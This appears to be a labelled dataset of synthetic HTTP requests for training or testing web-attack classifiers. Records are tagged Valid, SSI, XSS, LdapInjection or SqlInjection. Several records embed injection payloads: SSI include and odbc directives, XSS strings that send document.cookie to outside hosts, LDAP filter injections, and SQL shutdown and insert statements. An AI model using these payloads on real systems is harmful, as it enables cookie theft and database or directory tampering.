~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10681
Start - Id: 23508
class: Valid
GET /brjeNHezsr/yiEm/eeafgkisfmb/R1qX/Idhs9i3oselG1t/i9PQ.f8qWCHw/sEQn4uq8IurXnAumh/dHUi__S.jpg?0ebl1nep3euwcc=joftmp&oQNCQ=24&yy=00&bAWThw=aXo2o&ontplameghesudi=4864579&toaoE8Nenl=se&ldesVstsy=wstmLDahmsaqyrm&oa9n=80349&aaeZcttsbt2=7JZ0Mbl&ent=oi&uleTAiydN3=Eupxa1f8oCMol HTTP/1.0
Host: www.Opiiaevt.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress, deflate;q=0.7, deflate;q=0.3
Accept-Language: vwegttr-bnoumf;q=0.4, s0-c, Rkralr6-dtEo;q=0.0, 4de-lC;q=0.7
Cache-Control: no-cache
Client-ip: 29.220.169.125
Cookie: rs1yZu8fdETobject=e;lhr=sb0rorh8;dvpDJVHyAmG=i-noarU;irghs9=hi6ni7(;tlal=8005
Cookie2: $Version="110"
Date: Wed, 22 Aug 07 08:27:40 GMT
ETag: "rGq1BnAln3-I1RbT"
Expect: euei
From: ltnesme@hsentase.it
If-Modified-Since: Sat, 19 Nov 05 05:29:43 UTC
If-Unmodified-Since: Mon, 23 May 05 24:07:58 UTC
If-Match: *
If-None-Match: "f91eWlmGkrcd6os1uHQY"
If-Range: *
Max-Forwards: 25
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM d2ljU2UybHNpZWFzaXNlVDJIcmVtaWV1eGh0b3BldDNtY24waW12a25h
Range: 2302-,79-,82109-578
Referer: http://www.repei.de/arcelm.exe
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/9.5 (compatible; oeoo; Windows NT; ehs5ontnDl; dnYSpu)
UA-CPU: x86
UA-Disp: 987,566,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: HTTP/9.5 167.65.8.208:72
Transfer-Encoding: zEnrr
Upgrade: akoe/8.8, eee/8.5, nl0i/0.3, noNso/2.0
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 24687
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23508
Start - Id: 40395
class: SSI
GET /ttnke/uho4hUend7h/j6LYHyOR/MXYrXYMZze-oDST/couuES2lysohama8uyib/nph-7z6UxFRL0aHxB@/fm6YV@WqQM.jpeg? HTTP/1.0
Host: 68.253.190.55
Connection: nbat
Accept: audio/*, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: tuwra-konm, trst-6udie;q=0.1, i-t8ivsosi, aiqtkexa-uapM, e-sbQ;q=0.3
Cache-Control: mohet=gkl
Client-ip: 54.134.153.88
Cookie: vteaqdOta=nhce;lSdagtsio5Po=9dr;u4cht=<!-- #include     virtual="d:\windows\autoexec.bat"    -->
If-Unmodified-Since: Sat, 09 Sep 06 05:51:34 CET
If-Range: Sun, 19 Feb 06 09:09:03 GMT
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /swte/7xnpMe.tiff
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 9.1; Qe-tc; rv:2.5.0) Gecko/68411037
Transfer-Encoding: Er6aj; tiCaS=aemtatld

null

End - Id: 40395
Start - Id: 33954
class: Valid
POST /in3s8Kitsbe9nfthiu.cfm? HTTP/1.0
Content-Length: 80
Content-Language: w1hmnhth,asu,aeroci
Content-Encoding: deflate
Content-Location: http://www.hHrea.uk/iesjfI.rar
Content-MD5: dG94c2Ewcm5FamZpbk5saA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 May 08 08:27:03 CET
Last-Modified: Mon, 17 Oct 05 14:44:33 GMT
Host: 84.63.172.153
Connection: close
Accept: */*
Accept-Charset: euc-tw, gb2312;q=0.9, iso-2022-jp;q=0.8
Accept-Encoding: deflate;q=0.8, deflate;q=0.0
Accept-Language: tmk-s
Cache-Control: only-if-cached
Client-ip: 52.137.8.76
Cookie: LdtfyejArErgXi=8;nOnLnpinelwth=yj8bz;wgpnot3fd=2950810142;eistpQao3Ot=scswtweseso;n1ey0rneaescue=aoeshYgiih
Cookie2: $Version="333"
Date: Sat, 30 Jan 10 06:05:12 CET
ETag: "Qw1Qzb19GM3KbbZzq"
Expect: 100-continue
From: 8ehxe4e@oOewv.cz
If-Modified-Since: Sat, 05 Nov 05 14:01:20 UTC
If-Unmodified-Since: Fri, 18 Feb 05 18:50:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Apr 10 02:10:55 UTC
Max-Forwards: 74
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic bEFpazoxZWFpZHNz
Authorization: Digest realm
Range: 50468-961,8583-3
Referer: /oetep/xxcI/tttie3/aeF4quo.jsp
TE: gzip;q=0.2,gzip
Trailer: Via
User-Agent: 9anfiu/9.8.7.5.2
UA-CPU: x86
UA-Disp: 225,357,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 236x087
Via: HTTP/7.2 www.eooqi7vl.css
Transfer-Encoding: compress
Upgrade: qieelu/3.4, EqncM/6.9, btrA/6.0, idP/4.3, Owse/7.1
Warning: 808 www.a11otqpd.js "ieErLxrlK" "Tue, 21 Oct 08 21:39:20 CET"
X-Forwarded-For: 151.46.94.105
X-Serial-Number: 33226
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

stariobgeewg0zw=4369603&Ie=yd7ettnnh20eysrar&yne=s$fan&Etz69rg=9sWln2nI<1ttr

End - Id: 33954
Start - Id: 40967
class: SSI
PUT /lhp_D/5VF_pHarb5_I/dkibQ/ufne/fjoWhsDQpflEs8lX3wfQ/jer/ou_jEaU8JUi.j/vz5P2zanFxWNXo/uvw2h0k29Ln/YWRrtNtqSlink.asmx? HTTP/1.1
Content-Length: 240
Content-Language: h,iEO
Content-Encoding: gzip
Content-Location: /aelqotNj.tiff
Content-MD5: c2l0dHFkaGRtcG9jbzlhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Aug 08 08:33:52 CET
Last-Modified: Mon, 09 Jun 08 16:16:28 GMT
Host: 15.93.147.29
Connection: dt1ihuh
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 221.4.5.112
Cookie: dSemcds4=ef;d41enctli0=<!--   #odbc     connect="dioti,oto,luhno"     statement="select *  from  ead"-->;oml7odenaOsS=8896;edcihexi=oUBkAlDKkfvS;te2ddiI8zraiys=4xio r
Cookie2: $Version="56"
Date: Sun, 07 Mar 10 15:08:32 GMT
ETag: W/"SW16dEtP61Xm@eaVGdp"
Expect: z6jrvla=tgioetyu;dea8ddg1
From: odproetp@ielrtrNAl.cz
If-Modified-Since: Sat, 13 Jun 09 23:17:16 GMT
If-Unmodified-Since: Sat, 27 May 06 24:28:30 GMT
If-Match: *
If-None-Match: "sZa.MlyOTGWiaxd5k"
If-Range: *
Max-Forwards: 373
MIME-Version: 7.4
Pragma: oe=riW
Authorization: aoAFh i1et=ejhsw5t
Range: 12406-,948750-
Referer: http://yn0oPhF.be/sfedt0se/0hb4y8.png
Trailer: Expect
User-Agent: Mozilla/0.4 (Windows; U; WinNT 0.1; hb-i9; rv:4.4.8) Gecko/78676246
UA-Color: color16
Via: FTP/7.2 www.iewmaas.html:663, 5.2 243.185.105.195, FTP/6.0 www.rate9.tiff
Transfer-Encoding: deflate
Upgrade: tnrn/8.3, Tpo/9.5, noyBao/0.0, aeoa/8.2
X-Serial-Number: 842402347266345722

cebaiA=epAgom2liot&XshutdownJbgsoundNselectBewV=06194869&2as6e=ecmdwtlSo&eAeonionnobeth=n ch&oeij7ho=313197&soihhouoiny4i= ox$3&iu=81&EostrrdaIto=wht=or&oJZHadminwaftp=poIfiar6&AP2UWi@0=87&btehsmnsT=scriptam&K0G5F=aYvlZ7LC@F3p&mh=oqeo

End - Id: 40967
Start - Id: 46757
class: XSS
GET /bWgdCTqP/kTRkeragr/e5Pnx/wwotacTlAax/eQ__rVhNdVMyAgJL/mA/_eyimgEN@NCopenxt..js? HTTP/1.1
Host: www.fwhu.org
Connection: niuti3
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312, x-mac-chinesetrad, iso-8859-8, utf-7, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Client-ip: 39.174.238.228
Cookie: s0amAnnsoe=form6u(sn y@likesEchildyEqnc<;ew=)fp;e2xpea1grderu=a s0;iir[1t/no? =sfrom7;nR1yicva4iqute=<div    style  =   "  width:    expression([document.location.replace('http://www.orelstri.com/cgi-bin/il.cgi'+document.cookie);]); ">
Expect: gjcr
If-Match: "-4awrURIbvHZfJy"
Authorization: dvyHa nt3ss=hisel21
Referer: /cekhaiet/noh2liam.shtml
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 6.4; eT-2s; rv:6.7.4) Gecko/09584471
Via: HTTP/8.4 167.142.26.140:333
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46757
Start - Id: 47683
class: XSS
GET /ya5bAsjoosnri3/f1VCvIGvt/ceeieEtV5m/bGZcJ2Y.cfm?e2tobFi=%3Cimg++++src+%3D+%22+++iemestor++%3E++++%22+++onmouseover%3D+%22++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.llnietde.com%2Fcgi-bin%2Fteetolntte.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E HTTP/1.1
Host: www.EhuBijutrd.st:2816
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: nlqe7s-xr;q=0.6, g1latr-osNhtO, emtntmlh-p8o64
Cache-Control: no-store
Client-ip: 99.240.245.14
Cookie: bauh4L3lodlsp=eauCDNG;om=592;an3Ts8cia=te$aoipsel4o;autnaRwe2nJ=link16D tEw;;qhyrR2wI=h;rrIcuhU=58691
Cookie2: $Version="702"
Date: Wed, 22 Feb 06 11:56:57 GMT
ETag: W/"1J-g4mVQQ066LcLj0iD8"
Expect: 100-continue
From: zlDtEnh@hmvarofRt.ch
If-Modified-Since: Tue, 13 Nov 07 02:19:42 GMT
If-Unmodified-Since: Sun, 28 Feb 10 10:05:52 CET
If-Match: "GZpXPjgUThO8Eep"
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 9980
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM eXR0b2RubmMwbEhzaWVlZWUzZWhpZTJtcm5ucmluQWVzdzk2T3JlcmFUanU=
Authorization: NTLM c251bmxiaXRlT2RlcHVCbmVqSHIwMWJscGV0ZGhwYW9w
Range: 70-,2-,3-3356
Referer: /tbuh/Ettieu.jpg
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/1.2 (compatible; Konqueror/9.8; SunOS sun4u; 7nltencr)
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 934x7117
Via: 0.4 0.114.127.182:98626
Transfer-Encoding: gzip
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47683
Start - Id: 9478
class: Valid
GET /dEI5dazootsr2aogRvd/heysHuheF5u3b/hayuyae8/rD@Fh6/1E9/enoD5/nWf13c5pZANhmr8FG.php3?h3caeidiitYirt=%5Csc&pewxea=72&eoaumwam=qhaving+Nr-&hr=ts%40V&MbetweenF3L=pt&9n=fEi7egdm5t5redax&d8ad7sc=728456&T6rcpH2d6HXAL=oPbNzgiDpNjR&ihobitfho=lphpu HTTP/1.0
Host: www.loiendq.ch
Connection: close
Accept: audio/*;q=0.2, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: iasnEi-edtahaHo
Cache-Control: min-fresh=05124
Client-ip: 109.204.149.75
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="9"
Date: Sun, 09 Nov 08 03:35:09 UTC
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 100-continue
From: eo4la2@wre9irnxdA.be
If-Modified-Since: Mon, 12 Jan 04 06:49:19 CET
If-Unmodified-Since: Wed, 14 Apr 10 07:34:53 GMT
If-Match: *
If-None-Match: "@XwX4AbOKkbcetMD"
If-Range: *
Max-Forwards: 0817
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: NTLM T29FZXZ1aWU1aXM3aHBwYzdZZWVlbHlqaUU5RW9kY21ob24=
Range: -6,7-441
Referer: /nsNRdc.gif
TE: gzip;q=0.0,trailers
Trailer: Accept
User-Agent: r2ZVXkPb http://www.diGE.org
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 279x7075
Via: pj2/6.1 58.231.161.184:7
Transfer-Encoding: deflate
Upgrade: dttwl/5.1, totora/7.4, s2q/7.4
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 114650430157226
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9478
Start - Id: 10383
class: Valid
GET /hFeycDXt.f/2f4.jpg?aEnntqhre=680899&4fromQqKNDva9k0=anda&setxt=eshyg57teo HTTP/1.0
Host: www.feso1c.gov
Connection: keep-alive
Accept: application/zip, image/*, application/*
Accept-Charset: x-mac-korean;q=0.1, windows-1258;q=0.1, x-mac-ce;q=0.3, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 152.15.73.71
Cookie: ood=br9qcrkarti;tumrcyp=70;siiseoilhtor=aGqQRursH-y;nna=rcnhwviaE9rld
Cookie2: $Version="123"
Date: Sat, 30 May 09 01:26:05 GMT
ETag: W/"1TPdgqPyU.pgP5p"
Expect: 100-continue
From: biaabaeh@aBa2kd7.fr
If-Modified-Since: Fri, 18 Jul 08 16:19:56 UTC
If-Unmodified-Since: Thu, 20 Dec 07 12:12:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 3.9
Pragma: nas=uOivIt0
Proxy-Authorization: NTLM aDlybkFhaXMwbGlEZWlpcjdabUwzbnVuYTNldGZlSHNzTw==
Authorization: NTLM dGhOSHJkalFlZW1lbGVzZHlnbXA1bEVuZWFwNWVSc2hEYXVmOWJhdXQ3OA==
Range: 4-09953,-7815
Referer: /sQ0w0.gz
TE: chunked
Trailer: Pragma
User-Agent: enutycae/3.7.5.5.6
UA-CPU: MIPS
UA-Disp: 329,0706,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: HTTP/7.3 www.oh8a.jpg
Transfer-Encoding: deflate
Upgrade: gtg/0.1
Warning: 485 www.hfenR9bs.gif "Fitc0D" "Fri, 21 Nov 08 06:43:01 UTC"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 664473
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10383
Start - Id: 48276
class: XSS
PUT /p60M/nIloms9n4rS/dEH/5nE/R0blUg1diceta/ig0nremekc2t3ibeiy/cY4/nYjD-N.rYVw0vNBvhmr/huVooe8_SpyygZB6u.sh? HTTP/1.1
Content-Length: 50
Content-Language: s,eter,a0soaeks
Content-Encoding: compress
Content-Location: /unOa.php3
Content-MD5: YWtlaXNoOG5vZWh0MHVMcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Jan 07 16:17:26 CET
Last-Modified: Tue, 23 Mar 04 15:17:37 GMT
Host: 159.241.82.223
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: Esas-og;q=0.8, oy-6E;q=0.0, d0s-veabqar, u-dDrZrvri
Cache-Control: only-if-cached
Client-ip: 238.157.214.210
Cookie: nirvmauiv=<meta     http-equiv =   "  refresh    "  content    = "    0;url=javascript: [window.open('http://207.27.105.186/seinnt.jsp'+document.cookie);]     "   >
Cookie2: $Version="34"
Date: Wed, 15 Jun 05 02:27:07 UTC
ETag: "3nPp.-JJwnV9lEfO"
Expect: 100-continue
From: hoRi@FlkUTxtiad.cz
If-Modified-Since: Wed, 21 Jan 04 14:55:12 GMT
If-Unmodified-Since: Wed, 02 Jul 08 03:34:55 CET
If-Match: *
If-None-Match: "DFRpyEyG0b@XlMdTa"
If-Range: Wed, 13 Jan 10 12:55:33 GMT
Max-Forwards: 4815
Pragma: no-cache
Proxy-Authorization: Basic c2lyY2V0aTpUdDRlNQ==
Authorization: Digest qop=auth
Range: 47-8,720672-48,49834-80
Referer: http://www.editr.de/t0nn1a.rar
Trailer: If-None-Match
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 4.2; it-as; rv:6.7.0) Gecko/66338108
UA-CPU: MIPS
UA-OS: Win95
UA-Pixels: 715x493
Via: FTP/7.1 117.127.210.137:1169, ehjn7/9.2 www.soykySyS.tiff, 5.3 144.87.140.108
Transfer-Encoding: identity
Upgrade: ems/9.3, nLe/5.9, 8btF/5.6, oSoftr/5.9, s3s/8.4
Warning: 212 118.3.73.205 "skqhhoz" 
~~~~~: ~~~~~~~~~~~~~~

r36viwomL9=dnhavingp&v85n28NrC@_=rodrn1ntoekIThsns

End - Id: 48276
Start - Id: 37379
class: LdapInjection
GET /vGMz/dnyGY2y.Crh/tcPtB220yDy/ULk7ZgW/dy3WJC/dDSxo@L5nQml_wn7g/nYtcroi4c2oy/5Bn-dGKf3305Dju/t8L/hunAMjH.sh?mnaeta=ciK2artntfohnn&8ohkhuNoeE=e_n0NJ5F&aaeitnvonla7Eg=7&tprR=6585928 HTTP/1.0
Host: www.iemmakt.ch
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: )   (   |  (eTn=oy*)
Accept-Language: *
Cache-Control: max-stale
Client-ip: 98.165.130.171
Cookie: 8t42robq=iuSwunagr
Date: Mon, 21 Nov 05 19:52:10 CET
Expect: ioma6w
From: rantutaO@slU8aeire.ch
If-Modified-Since: Sat, 27 May 06 16:09:23 UTC
If-Unmodified-Since: Fri, 23 Dec 05 10:17:58 UTC
If-Match: *
If-None-Match: "oP6k4HGzpi4KMWK"
If-Range: Sun, 13 May 07 19:31:05 CET
Max-Forwards: 6
MIME-Version: 7.0
Pragma: h='ag55'
Proxy-Authorization: NTLM cE1xbFZzSXJnb2V2N2FlYWVvb2FydG9qMjJMZDVnbjFxcg==
Authorization: Digest opaque="uiel"
Range: 059445-,841-
Referer: /ahpa9.mp3
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.6 (compatible; MSIE 2.9; Unix; lqxnw; epir; 8dbde8M)
UA-OS: Windows 95
UA-Pixels: 5445x5018
Via: 1.8 191.79.172.220:205
Transfer-Encoding: gzip
Upgrade: oth/1.4, eoZf/2.8
X-Serial-Number: 71830
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37379
Start - Id: 37389
class: LdapInjection
GET /yXO_4PTbXj6Un/obJ.b/ic_pud38eX/A%uc_div4-s/socfeelw/y4wcn-TEGZ1B/cmgXD@wy/as8rrpaxymsoO4fzbt2e.jsp?qWLm9A=awOiAmwgoKY&8ehOte3yEem=9&dTa0y=fcLose4gtten&cop4uo=95&qeia=2vsoO&4eubroLlhaOxm3=3af%27&proonedeya=gechotUdhe%28unionmraae&cSiteacSeexWspr=men&Dnl5o=ne&4lE@link=cnh&3p2uecabAa=dMQ2WOE&melsgil1no=8593572 HTTP/1.1
Host: 11.205.19.110:6
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: Fi-r;q=0.4, t-4t8fmie;q=0.0
Cache-Control: no-store
Date: Sat, 27 Jan 07 22:43:36 GMT
ETag: W/"3oQ5AHo6bdZvKf._"
Expect: eaertym
If-Modified-Since: Mon, 03 Mar 08 23:03:49 CET
If-Unmodified-Since: Tue, 10 Nov 09 04:58:19 CET
If-Match: "pBn3hxm2V3CBcS86"
If-None-Match: "mP3f.NvrV6vknYE"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.8
Pragma: m7mnt6tO='ox41aes'
Authorization: NTLM ZVRlbHZBN2Z2aEdnd2hubmVhSHJtdkxlOGh6bmE5aHpHZHN0bXdkMm5vd0Vjemk=
Referer: http://www.reduy.de/egasrriE/ai1cdcs/sot1yt/rwnrit.fgf
Trailer: If-None-Match
User-Agent: )(   |    (cn=*o'brien*    )(mail   =*o   'brien* )
UA-CPU: 68000
Via: 1.1 44.125.212.179
Transfer-Encoding: gzip
Warning: 726 www.alzEot.jpeg:23 "gqmreharuon8ber" "Wed, 20 May 09 09:50:37 UTC"

null

End - Id: 37389
Start - Id: 42738
class: SqlInjection
PUT /thIiwm3ahpoIp/sAhcsc9c_Wx0GZZ/li64vSeadw/Ti1o5orenprYrthdN/Cma@form6YTJW/rk8atdus/6etyc9YklhtnAg6n37/y@_Z5cperluSed8P/A2execfopenj1gP9W.8im/exomqbMHb@Rdp.js? HTTP/1.0
Content-Length: 22
Content-Language: iamAgaM,ihneW
Content-Encoding: compress
Content-Location: http://iolnndf.cz/lgrin/emdr/d30Oc.tar.gz
Content-MD5: ZWVydGVhZEJpZWVyaWFUYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Aug 04 24:18:43 GMT
Last-Modified: Sat, 06 Nov 04 02:28:16 CET
Host: 214.166.0.75:80
Connection: aqoRei
Accept: text/*, text/html;q=0.5, text/xml
Accept-Charset: *
Accept-Encoding: compress;q=0.7
Accept-Language: thi81kp-nI;q=0.5, Xnzocftf-pdofana;q=0.4, IT0FSE-wtvweI;q=0.5, q-pcoina;q=0.7
Cache-Control: max-stale
Client-ip: 140.168.169.121
Cookie: z7I_WimgDbAB8=ea2;ifipuiriea1=yh(;yegonyiis=719571110;tNg9y8li4d=edeleteechdeleteplaem;;gynBvyiteeno=';     shutdown--;lVjyHEnnolemqnH=8systemixmld7ftp~iu%nd
Cookie2: $Version="75"
Date: Tue, 17 Jul 07 12:52:56 UTC
ETag: W/"abZIr2JDE4S7TNj8H"
Expect: haeo
From: 8rEwHrt@tNno.biz
If-Modified-Since: Tue, 09 Mar 04 23:00:21 UTC
If-Unmodified-Since: Wed, 20 Sep 06 20:46:52 UTC
If-Match: "YNWvPTA42T.qH-wi"
If-None-Match: "E66mTYGKmTsEUveW"
If-Range: *
Max-Forwards: 0214
MIME-Version: 0.0
Pragma: Iea='rtdEt'
Proxy-Authorization: ddues lrijn=5oj80s
Authorization: Digest algorithm=MD5-sess
Range: 48614-31991
Referer: http://nCdz.ch/aon3/aSre/nettanW.asp
TE: gzip
Trailer: Range
User-Agent: Mozilla/7.7 (compatible; MSIE 6.4; Solaris; abdxjwrtM)
UA-CPU: MIPS
UA-Disp: 257,411,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 253x905
Via: FTP/8.2 196.63.208.9:6, FTP/5.4 172.192.154.66, 6.7 122.14.74.66
Transfer-Encoding: identity
Upgrade: wio/7.9, nnng/7.1, s21rm/9.9, ondtA/4.0
Warning: 749 www.ibHflcs.js "1xauhotitislrT4ty6co" "Mon, 24 Sep 07 08:58:26 GMT"
X-Forwarded-For: 4.253.23.206
X-Serial-Number: 8958366538347
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oK6zia58rt1na=89225581

End - Id: 42738
Start - Id: 15439
class: Valid
GET /bstdinmFh8D/eoioeml6pswossr/4batisnt/eialsiixt4tozaCalp/hdouHathwSocc0.mspx?cmreerIeoofc=h&salmtia2nhj=646 HTTP/1.1
Host: 167.196.217.51
Connection: close
Accept: audio/x-wav;q=0.3
Accept-Charset: x-mac-roman;q=0.8, x-mac-japanese, iso-8859-8;q=0.5
Accept-Encoding: deflate, deflate, deflate, gzip;q=0.8
Accept-Language: steihinr-y3wspuFr;q=0.9, fs-rnx;q=0.3, eres-i, n-xeqrIehe;q=0.5, Tg-ebTarish;q=0.8
Cache-Control: only-if-cached
Client-ip: 104.139.105.118
Cookie: todaaeeno=eas$+mi;jEKRomchild=eiiSqtnkiPeltuuprg;herneia9scsos=uoA;ZU4.W8=aae;a7trmi=18;zaRts4FG=eiti
Cookie2: $Version="373"
Date: Wed, 01 Jul 09 12:29:40 CET
ETag: W/"XrIK5Z@E08iUctci2yO"
Expect: o00to=jrir5a;telilZd
From: hreEo@mhtthLrava.org
If-Modified-Since: Wed, 26 Jul 06 12:53:47 CET
If-Unmodified-Since: Sun, 02 Sep 07 21:38:34 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Mar 10 09:25:29 GMT
Max-Forwards: 2569
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest response="AB0eE7Cec4ac14FB07e3c50f9b74E1ad"
Authorization: NTLM ZXNmNmVvdThub2Vob3NzZmhvOGNzSXRodGRpTW5MaHI=
Range: 4188-,1306-94985
Referer: /De2uOIOE/t37aahs.dll
TE: chunked;q=0.0,deflate;q=0.1
Trailer: If-Match
User-Agent: Mozilla/6.7 (compatible; sieit4cusj; SunOS sun4u; shn6Yt; sa0iztfr; AdvclAmp)
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8272x2964
Via: HTTP/8.0 224.237.96.240, 8.5 89.220.232.178
Transfer-Encoding: identity
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 865 www.btsmfeds.js "eterOr" 
X-Forwarded-For: 180.18.29.73
X-Serial-Number: 4215361371193474
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15439
Start - Id: 18984
class: Valid
GET /a328stbcaSgtip3osi/rdO.tKXle2_uOP9liL/TfIed1ds5ZIZ/4mpoo7itddbetiet51ua/ioa10xSienwHcs66/hDcleCgo9ot0cch18o/awecw/no/6QY/lD9@0xUmm3F6zxsIoUs.msf? HTTP/1.0
Host: 154.195.209.140
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.1
Accept-Language: Losbiosd-ehrD7;q=0.3
Cache-Control: hoey=einHy4l
Client-ip: 125.240.132.23
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="652"
Date: Tue, 31 Mar 09 20:49:07 GMT
ETag: "1LxG-41DxiNy9.n8Y-m"
Expect: anmtj5i=orsnh0o;nteS
From: l14gyjst@isddra.be
If-Modified-Since: Sun, 21 Mar 10 17:37:51 CET
If-Unmodified-Since: Wed, 24 Feb 10 24:29:49 GMT
If-Match: "IHYK1y_.zN1_smXtJp"
If-None-Match: *
If-Range: Tue, 08 Sep 09 08:41:00 GMT
Max-Forwards: 6
MIME-Version: 9.9
Pragma: t1w='osdnt79e'
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: Basic dDZ0cjppbnRhdG4=
Range: 63-4,19-3,96935-
Referer: http://www.tiow.be/ziAp0i/int0r.mdb
TE: deflate,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (X11; U; Solaris 3.2; ia-im; rv:9.3.9) Gecko/19697608
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9774x0474
Via: 7.3 113.141.185.52
Transfer-Encoding: compress
Upgrade: enfzlm/9.3, RMow/0.2, Fmr1/3.8, tsi/2.4, pil2/2.5
Warning: 231 www.oebeetlc.jpeg "ttllcvtieaktaidHen" 
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18984
Start - Id: 41847
class: SqlInjection
GET /nsOehle.png?ixho=r-nBw32FMeUU&seoIRwtma=%27%3B+++++insert++++into++ioh9hs++++values%28666%2C%27vwisse9%27%2C%27rur3%27%2C0xfffff%29 HTTP/1.1
Host: www.hPhtv.biz:87842
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=05012
Client-ip: 78.57.136.131
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="08"
Date: Sat, 10 Jun 06 06:54:02 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: eeofsc=natlqi
From: dupNd@t1Lces4e.com
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Thu, 03 May 07 24:46:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9630
MIME-Version: 1.6
Pragma: auh=nycmry
